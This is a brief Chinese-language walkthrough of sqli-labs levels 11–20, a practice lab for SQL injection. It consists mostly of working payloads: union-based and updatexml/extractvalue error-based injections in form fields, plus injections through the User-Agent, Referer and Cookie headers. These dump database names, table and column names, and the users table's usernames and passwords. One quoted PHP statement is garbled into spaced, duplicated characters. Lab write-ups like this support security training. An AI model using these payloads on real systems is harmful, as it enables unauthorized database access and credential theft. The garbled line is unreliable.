sqlilabs(11-20关)
第十一关
username=1’ or ‘1’=‘1 password=1’ order by 2#
通过上述语句判断出字符数为2
uname=1’ or ‘1’=‘1&passwd=1’ union select 1,2#&submit=Submit
最后得到数据
图六
uname=1’ or ‘1’=‘1&passwd=1’ union select database(),user()#&submit=Submit
图七
uname=1’ or ‘1’='1&passwd=1’union select group_concat(username),group_concat(password) from security.users#&submit=Submit
第十二关
第十三关
单引号有报错回显
再继续试探发现为单引号括号
orderby 字段数为2
uname=uname=1’) and 1 union select 1,updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=1&submit=Submit
uname=1’) and 1 union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ limit 0,1),0x7e),1)#&passwd=1&submit=Submit
第十四关
与13大体相同
只是把’)改为")
第十五关
多次尝试无报错 无回显
尝试布尔盲注
修改脚本
运行结束
第十六关
与15关相同
第十七关
两个报错注入
第十八关
uname和passwd参数都无法进行sql注入
i n s e r t = " I N S E R T I N T O ‘ s e c u r i t y ‘ . ‘ u a g e n t s ‘ ( ‘ u a g e n t ‘ , ‘ i p a d d r e s s ‘ , ‘ u s e r n a m e ‘ ) V A L U E S ( ′ insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES (' insert="INSERTINTO‘security‘.‘uagents‘(‘uagent‘,‘ipaddress‘,‘username‘)VALUES(′uagent’, ‘$IP’, $uname)";
爆库名
User-Agent: ',extractvalue(1,concat(0x23,database(),0x23,version(),0x23,user())),1)#
爆表名
User-Agent:’,extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’))),1)#
爆列名
User-Agent:’,extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’))),1)#
第十九关
1’,1)#
–多出一个闭合
爆库名
Referer: http://sqli.exp-9.com/Less-19/1’,extractvalue(‘anything’,concat(’~’,(select database()),’~’)))#
第二十关
cookie:uname = admin’ #
爆数据
Cookie: uname=admin’ and extractvalue(‘anything’,concat(’~’,(select group_concat(username,’~’,password) from security.users),’~’))#